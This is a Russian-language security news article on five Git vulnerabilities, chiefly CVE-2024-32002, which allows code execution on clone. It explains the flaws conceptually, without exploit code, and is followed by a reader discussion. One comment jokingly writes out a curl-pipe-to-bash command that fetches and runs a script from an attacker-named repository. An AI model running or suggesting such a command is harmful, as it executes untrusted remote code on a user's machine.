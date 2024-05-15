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Пять уязвимостей в Git, среди которых одна критическая и две опасные

15.05.2024 23:58

Опубликованы корректирующие выпуски распределённой системы управления исходными текстами Git 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2 и 2.39.4, в которых устранены пять уязвимостей. Наиболее серьёзная уязвимость (CVE-2024-32002), которой присвоен критический уровень опасности, позволяет добиться выполнения кода злоумышленника при выполнении клонирования командой "git clone" репозитория, подконтрольного атакующему.

Уязвимость проявляется только в файловых системах, не различающих регистр символов и поддерживающих символические ссылки, например, используемых по умолчанию в Windows и macOS. Эксплуатация осуществляется через создание в субмодуле каталога и символической ссылки, отличающихся только регистром символов, что позволяет добиться записи файлов в каталог .git/, вместо рабочего каталога субмодуля. Получив возможность записи в .git/ атакующий может переопределить hook-вызовы через .git/hooks и добиться выполнения произвольного кода во время выполнения операции "git clone".

Другие уязвимости:

  • CVE-2024-32004 - атакующий в многопользовательской системе может подготовить специально оформленный локальный репозиторий и добиться выполнения кода при его клонировании. В частности, атакующий может создать локальный репозиторий, выглядящий как частичный клон, в котором отсутствует определённый объект. Клонирование этого репозитория приведёт к выполнению кода с правами пользователя, выполняющего операцию клонирования.
  • CVE-2024-32465 - клонирование из zip-архивов, содержащих полный git-репозиторий, включающий hook-и в каталоге .git/, приведёт к выполнению этих hook-ов.
  • CVE-2024-32020 - создание локальных клонов репозитория на том же диске в многопользовательской системе позволяет другим пользователям изменить файлы, для которых задействованы жёсткие ссылки.
  • CVE-2024-32021 - клонирование локального репозитория с символическими ссылками, может использоваться для создания жёстких ссылок на произвольные файлы в каталоге objects/.

Помимо устранения уязвимостей в новых версиях также предложено несколько изменений, нацеленных на повышение защиты от уязвимостей, приводящих к удалённому выполнению кода и манипулирующих символическими ссылками при выполнения клонирования. Например, git теперь выдаёт предупреждение при наличии символических ссылок в каталоге .git/. Пути к субмодулям отныне могут содержать только реальные каталоги. При пересечении символических ссылок и каталогов, обрабатываются каталоги. При выполнении "git clone" добавлена защита от выполнения hook-ов во время клонирования и усилены проверки параметра core.hooksPath.

  1. Главная ссылка к новости (https://lkml.org/lkml/2024/5/1...)
  2. OpenNews: Уязвимости в Git, позволяющие перезаписать файлы или выполнить свой код
  3. OpenNews: Уязвимости в Git, приводящие к утечке и перезаписи данных
  4. OpenNews: Две уязвимости в Git, способные привести к удалённому выполнению кода
  5. OpenNews: Уязвимости в Git, проявляющиеся при клонировании субмодулей и использовании git shell
  6. OpenNews: Обновление Git с устранением уязвимости, допускающей удалённое выполнение кода
Лицензия: CC BY 3.0
Короткая ссылка: https://opennet.ru/61180-git
Ключевые слова: git
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Обсуждение (30) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, Аноним (1), 00:25, 16/05/2024 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +1 +/
    Для симлинков в винде нужны права администратора.
     
     
  • 2.5, Аноним (1), 00:32, 16/05/2024 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    Вернее не права администратора, а SeCreateSymbolicLinkPrivilege (которая обычно даётся при "Запустить от имени админестратора").
     
  • 2.6, нах. (?), 00:39, 16/05/2024 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    найди мне модного современного разработчика-под-линукс не выклянчившего/вымутившего/вышантажировавшего себе админских прав на своей вянде?

     
     
  • 3.11, pavlinux (ok), 00:50, 16/05/2024 [^] [^^] [^^^] [ответить]  
    		• –2 +/
    Ну я, чо дальше? :
     
     
  • 4.16, Аноним (16), 01:07, 16/05/2024 [^] [^^] [^^^] [ответить]  
    		• +/
    Непонятно, зачем нужен эксплойт, если можно сказать ему запустить 'curl https://github.com/jiatan/pwnd/blob/master/install.sh | bash', и он запустит
     
  • 4.21, Аноним (21), 02:16, 16/05/2024 Скрыто ботом-модератором     [к модератору]
    		• +1 +/
     

  • 1.2, Аноним (2), 00:26, 16/05/2024 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +2 +/
    А вот на расте такого бы не было
     
     
  • 2.7, Аноним (7), 00:44, 16/05/2024 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    Язык программирования сравнивать с системой контроля версий как-то странно и удивительно что это кому-то приходит в голову.
     
     
  • 3.9, Аноним (9), 00:48, 16/05/2024 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Ты видел такие проблемы на расте?
     
     
  • 4.15, ИмяХ (ok), 00:59, 16/05/2024 [^] [^^] [^^^] [ответить]  
    		• +/
    CVE-2022-21658
     
  • 3.10, Аноним (10), 00:49, 16/05/2024 Скрыто ботом-модератором     [к модератору]
    		• –1 +/
     
  • 2.18, Ivan_83 (ok), 01:43, 16/05/2024 Скрыто ботом-модератором     [к модератору]
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  • 2.27, Аноним (27), 02:57, 16/05/2024 Скрыто ботом-модератором     [к модератору]
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     ....ответы скрыты (6)

  • 1.3, Аноним (3), 00:26, 16/05/2024 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +2 +/
    > приведёт к выполнению этих hook-ов

    Хуки -- мерзотнейшая штука. Сразу вырубаю эту херню к чертям собачьим. К примеру, в веб-проектах хуки устанавливаются таким куском фекалий, как npm-пакет husky. Прикиньте, делаю гит коммит, не имея nodejs в $PATH, и тут вдруг гит ругается, что хук ругается, что nodejs не найден. Я на такое как бы не подписывался, какого ху_ гит запускает какой-то васянский код при гит-коммите? Ах да, postinstall-скрипты тоже надо вырубать нахрен через .npmrc. Если вы этого не сделали, любой васян из интернета сможет запускать код под вашими правами и воровать ваш ~/.config/chromium. Посчитать, скольки васянам вы даете полные права на вашу систему: find node_modules -name package.json | wc -l

     
     
  • 2.4, Аноним (1), 00:29, 16/05/2024 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    >хуки устанавливаются таким куском фекалий, как npm-пакет husky

    Так и запишем: "вредоносное ПО".

     
  • 2.8, Васян (?), 00:47, 16/05/2024 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    Так тут не git, а npm пачкает все фекалиями
     
  • 2.14, Витюшка (?), 00:57, 16/05/2024 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    Так это касается любых языков программирования и систем сборки и репозиториев и любых пакетов дистрибутива - там тоже выполняются postinstall bash-портянки, только от рута уже.

    Проблема в ужасной "безопасности" Linux для десктопов. Когда любой Вася получает доступ ко всему home. Мне как раз на системные файлы плевать - снёс/заново установил и проблем нет.

     
     
  • 3.29, penetrator (?), 03:14, 16/05/2024 [^] [^^] [^^^] [ответить]  
    		• +/
    это касается не только Linux
     
  • 2.17, Аноним (17), 01:43, 16/05/2024 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    NPM по хорошему в докер убирать надо.
     
     
  • 3.20, Аноним (20), 02:08, 16/05/2024 [^] [^^] [^^^] [ответить]  
    		• +/
    Попрошу ещё поглубже, пожалуйста
     
  • 3.25, Аноним (25), 02:35, 16/05/2024 [^] [^^] [^^^] [ответить]  
    		• +/
    Докер стоит денег. И в целом от этой проблемы вас не спасёт.
     
     
  • 4.26, Аноним (16), 02:55, 16/05/2024 Скрыто ботом-модератором     [к модератору]
    		• +/
     

  • 1.12, pavlinux (ok), 00:51, 16/05/2024 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –4 +/
    > позволяет добиться выполнения кода злоумышленника при выполнении клонирования командой "git clone"

    позволяет добиться выполнения кода при выполнении кода // fixed

    > Клонирование этого репозитория приведёт к выполнению кода с правами пользователя, выполняющего операцию клонирования.

    выполнению кода с правами пользователя, выполняющего код // fixed

     

  • 1.13, Аноним (7), 00:55, 16/05/2024 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Я помню в одной конторе настроили хуки так что оно писало об изменениях в программе в slack (пока этот чат не стал платным для владельца). Двоякое ощущение - вроде бы и удобно для менеджмента, а вроде бы как и не очень - отвлекало немного. А ещё когда делают процесс с код-ревью и мелкими задачами, так вообще не айс.
     
  • 1.19, Аноним (19), 02:00, 16/05/2024 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –1 +/
    > например, используемых по умолчанию в Windows и macOS

    Тот кто писал, явно не работал с macOS

     
     
  • 2.23, Аноним (21), 02:19, 16/05/2024 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    Ну вообще-то apfs которая используется на системном диске как раз case insensitive. Так что если ты застрял на hfs+ со своим макбуком 2008 года с авито, то с разморозочкой.
     
     
  • 3.28, Аноним (28), 03:11, 16/05/2024 [^] [^^] [^^^] [ответить]  
    		• +/
    А я-то думал, откуда это лишение фич прогрессом обзывают. А оно вон как, the usual suspects. Не сидится им на маке почему-то.
     
     
  • 4.30, Аноним (21), 03:38, 16/05/2024 [^] [^^] [^^^] [ответить]  
    		• +/
    > лишение фич

    И опять ты пaльцeм в гyзнo попал 😆 Но даже не буду oбъяcнять почему, уж извольте-с.

     

  • 1.24, Изя (?), 02:31, 16/05/2024 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    И две смешные
     

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